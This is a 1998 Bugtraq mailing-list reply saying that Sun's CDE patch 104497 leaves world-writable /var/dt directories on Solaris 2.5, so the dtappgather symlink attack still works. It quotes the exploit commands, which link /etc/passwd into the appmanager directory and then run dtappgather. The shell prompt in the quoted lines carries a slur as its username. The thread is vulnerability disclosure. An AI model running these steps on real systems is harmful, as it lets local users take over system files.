[6175] in bugtraq
Re: /usr/dt/bin/dtappgather exploit
daemon@ATHENA.MIT.EDU (J.A. Gutierrez)
Wed Feb 25 18:48:37 1998
Date: Wed, 25 Feb 1998 20:26:02 +0100
Reply-To: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
X-To: steven.goldberg@West.Sun.COM
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199802251859.KAA09759@thecrags.West.Sun.COM> from "Steven
Goldberg - SE - Seattle WA" at Feb 25, 98 10:59:38 am
>
> patches 104497 CDE 1.0.1: dtappgather patch
I'm afraid that's not enough: it fixes the DTUSERSESSION
bug; but it doesn't fixes directory permisions.
In a Solaris 2.5 sparc box, with patch 104497-02
you have:
drwxrwxrwx 4 root root 1536 Feb 25 19:46 /var/dt
drwxrwxrwx 3 bin bin 512 Jan 20 1997 /var/dt/appconfig
drwxr-xr-x 4 elias robot 512 Oct 6 14:42 /var/dt/tmp
^^^^^ this is a normal non-admin account; sometimes
the CDE login sessions changes it.
so, it's still vulnerable to the link exploit
(but yes, this is not a problem in 2.6, I don't know about 2.5.1)
> > > nigg0r@host% ls -l /etc/passwd
> > > -r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd
> > > nigg0r@host% ln -s /etc/passwd
> /var/dt/appconfig/appmanager/generic-display-0
> > > nigg0r@host% dtappgather
--
J.A. Gutierrez So be easy and free
when you're drinking with me
I'm a man you don't meet every day
finger me for PGP (the pogues)
